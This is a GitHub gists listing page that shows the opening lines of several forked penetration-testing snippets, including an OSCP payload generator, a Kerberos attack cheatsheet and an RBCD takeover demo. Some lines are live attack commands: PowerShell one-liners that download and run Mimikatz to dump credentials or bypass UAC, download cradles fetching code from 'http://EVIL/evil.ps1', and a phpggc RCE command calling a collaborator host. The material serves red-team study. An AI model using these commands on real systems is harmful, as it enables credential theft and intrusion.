anshuman_k
I hereby claim:
- I am anshumansrivastavagit on github.
- I am anshuman_k (https://keybase.io/anshuman_k) on keybase.
- I have a public key ASAx2rCSwxbDW1J_nbtTVWmX6Nt2c74ntGcZ20luUH7txQo
To claim this, I am signing this object:
Anshuman Srivastava AnshumanSrivastavaGit
AnshumanSrivastavaGit
/ oscp_payload_generator.sh
Created
July 27, 2024 10:44
— forked from m8sec/oscp_payload_generator.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Script to quickly and easily create non-meterpreter payloads for the OSCP | |
| # @m8sec | |
| # Note: It is recommeneded to create a new directory before running this | |
| # script. All payloads will be placed in the current directory | |
| IP="127.0.0.1" # <YOUR IP HERE> | |
| PORT=443 # You may have to change this if there are outbound restrictions on the target ;) |
AnshumanSrivastavaGit
/ aduser_lookup.sh
Created
July 27, 2024 10:43
— forked from m8sec/aduser_lookup.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Author: m8r0wn | |
| # Description: Uses the Linux net commands to lookup a user in Active Directory | |
| # This is the Linux equivalent of: net user [Username] /domain | |
| # Usage: ./aduser_lookup.sh [username] [password] [DC-Server] [Lookup-User] | |
| if [ ! $1 ]; | |
| then | |
| printf "[-] Usage: $0 Username Password DC_Server username_to_lookup\n" |
AnshumanSrivastavaGit
/ pentesting_cheatsheet.ps1
Created
July 27, 2024 09:42
— forked from moscowchill/pentesting_cheatsheet.ps1
Intern Pentesting notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| #Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| #Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| #Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" |
AnshumanSrivastavaGit
/ rbcd_demo.ps1
Created
June 12, 2023 14:40
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
AnshumanSrivastavaGit
/ wmic_cmds.txt
Created
May 31, 2023 16:13
— forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
AnshumanSrivastavaGit
/ SimpleHTTPServerWithUpload.py
Created
April 28, 2023 06:43
— forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
AnshumanSrivastavaGit
/ kerberos_attacks_cheatsheet.md
Created
February 4, 2023 08:58
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
AnshumanSrivastavaGit
/ DownloadCradles.ps1
Created
January 31, 2023 06:31
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
AnshumanSrivastavaGit
/ phpggc-generate-payloads.sh
Created
January 13, 2023 14:47
— forked from honoki/phpggc-generate-payloads.sh
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" | |
| # generate gadget chains |
NewerOlder